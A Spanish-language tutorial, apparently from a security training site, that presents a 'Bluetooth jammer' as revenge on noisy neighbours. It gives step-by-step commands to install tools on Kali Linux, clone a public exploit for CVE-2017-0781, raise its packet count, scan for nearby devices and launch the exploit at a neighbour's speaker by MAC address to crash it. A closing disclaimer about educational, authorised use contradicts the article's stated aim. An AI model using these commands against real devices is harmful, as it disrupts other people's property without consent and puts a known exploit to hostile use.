Cobre venganza de sus vecinos ruidosos saboteando sus bocinas Bluetooth. Cómo crear un “Bluetooth jammer” con sólo 9 comandos y sin hardware especial

Todos hemos lidiado con vecinos molestos que no dejan de escuchar música a un alto volumen, incluso de madrugada y gracias a que la mayoría de los hogares ahora cuenta con bocinas Bluetooth.

Cuando la amabilidad no es suficiente para que los vecinos dejen de hacer ruido, puede recurrir a un método más asertivo. En esta ocasión, los especialistas en seguridad en redes del Instituto Internacional de Seguridad Cibernética (IICS) le mostrarán cómo estropear el funcionamiento de una bocina Bluetooth y otros dispositivos que dependen del uso de este protocolo.

Iniciar con el proceso

Acorde a los expertos en seguridad en redes, antes de comenzar el ataque deberá instalar Kali Linux (https://www.kali.org/downloads/).

  • Para que el exploit funcione correctamente, debe instalar las siguientes dependencias:
apt-get update
apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
  • A continuación actualizaremos pwntools:
pip install --upgrade pip
pip install --upgrade pwntools
  • Posteriormente, los expertos en seguridad en redes nos mencionan que habrá que instalar las bibliotecas necesarias para trabajar con Bluetooth
apt-get install bluetooth libbluetooth-dev
pip install pybluez
  • Descargue el exploit utilizando el siguiente comando:
git clone https://github.com/ojasookert/CVE-2017-0781
  • En el archivo de Python descargado, los expertos en seguridad en redes recomiendan corregir la cantidad de paquetes cambiando la variable de conteo a un mínimo de 30 mil

Uso de la herramienta

  • Escaneamos la conexión Bluetooth con el siguiente comando:

hcitool scan

  • Seleccione el dispositivo, copie su dirección MAC y escriba el comando:
python CVE-2017-0781.py TARGET = <MAC address>

Al ejecutar este comando se enviarán múltiples solicitudes al dispositivo afectado, lo que generará un desbordamiento de búfer y evitará que la bocina Bluetooth funcione correctamente, solucionando así sus problemas por vecinos escandalosos.

Los expertos de IICS recomiendan utilizar esta técnica solo en entornos controlados y, de ser posible, con autorización expresa del resto de personas involucradas. Este artículo fue elaborado con fines enteramente didácticos. Los expertos del IICS recomiendan utilizar esta técnica solo en entornos controlados y, si es posible, con la autorización del resto de personas involucradas. Este tutorial es solo para fines educativos y de investigación. No haga un mal uso de esta información.